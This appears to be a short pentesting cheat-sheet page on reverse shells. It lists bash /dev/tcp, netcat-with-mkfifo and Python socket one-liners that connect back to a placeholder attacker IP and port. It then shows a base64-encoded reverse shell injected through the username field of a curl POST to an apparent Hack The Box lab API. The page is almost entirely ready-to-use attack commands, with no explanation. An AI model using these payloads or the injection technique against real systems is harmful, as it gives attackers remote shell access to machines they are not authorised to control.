Reverse Shell

bash -c "bash -i >& /dev/tcp/<ATTACKER IP>/<LISTENING PORT> 0>&1"
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ATTACKER IP> <LISTENING PORT> >/tmp/f
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<ATTACKER IP>",<LISTENING PORT>));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

With command injection

echo 'bash -i >& /dev/tcp/10.10.15.113/1111 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg==
curl -X POST http://2million.htb/api/v1/admin/vpn/generate --cookie "PHPSESSID=vmqmtudsnrgq93tjv1cfbnkf9s" --header "Content-Type: application/json" --data '{"username":"sandia; echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNS4xMTMvMTExMSAwPiYxCg== | base64 -d | bash;"}'
PreviousPrivilege EscalationNextShell interactiva estable

Last updated